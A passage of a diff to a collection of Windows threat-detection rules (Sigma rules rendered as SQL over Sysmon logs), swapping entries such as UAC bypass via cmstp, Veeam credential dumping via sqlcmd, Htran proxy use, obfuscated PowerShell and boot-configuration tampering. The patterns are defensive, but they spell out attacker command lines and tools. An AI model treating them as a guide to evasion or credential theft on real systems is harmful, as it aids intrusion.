"proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Exotic software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE 
'%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT 
(CommandLine = ''))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", - "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "title": "Write Protect For Storage Disabled", + "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "status": "experimental", + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "title": "Application Whitelisting Bypass via Dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "test", + "description": "Detects execution of of Dxcap.exe", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate execution of dxcap.exe by legitimate user" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_lolbin_susp_dxcap.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon 
(@Mandiant/@FireEye), oscd.community", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.t1027", - "attack.execution", + "attack.defense_evasion", + "attack.t1140", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Renamed AutoHotkey.EXE Execution", - "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", - "author": "Nasreddine Bencherchali", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((Image LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR Image LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_autohotkey.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "Suspicious PowerShell Invocation From Script Engines", - "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "status": "test", - "description": "Detects suspicious powershell invocations from 
interpreters or unusual programs", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_script_engine_parent.yml" + "filename": "proc_creation_win_malware_qbot.yml" }, { - "title": "PDQ Deploy Remote Adminstartion Tool Execution", - "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", - "status": "experimental", - "description": "Detect use of PDQ Deploy remote admin tool", - "author": "frack113", + "title": "Malicious Windows Script Components File Execution by TAEF Detection", + "id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "status": "test", + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, 
Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\te.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\te.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\te.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pdqdeploy_execution.yml" + "filename": "proc_creation_win_susp_use_of_te_bin.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "status": "test", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Suspicious Execution of Shutdown to Log Out", - "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the rare use of the command line tool shutdown to logoff a user", - 
"author": "frack113", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_shutdown_logoff.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like 
mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "status": "test", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Node Process Executions", - "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", - "status": "experimental", - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "author": "Max Altgelt (Nextron Systems)", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "status": "test", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "Use of Remote.exe", - "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "title": "Suspicious CMD Shell Output Redirect", + "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "status": "experimental", - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." 
+ "Legitimate admin scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE 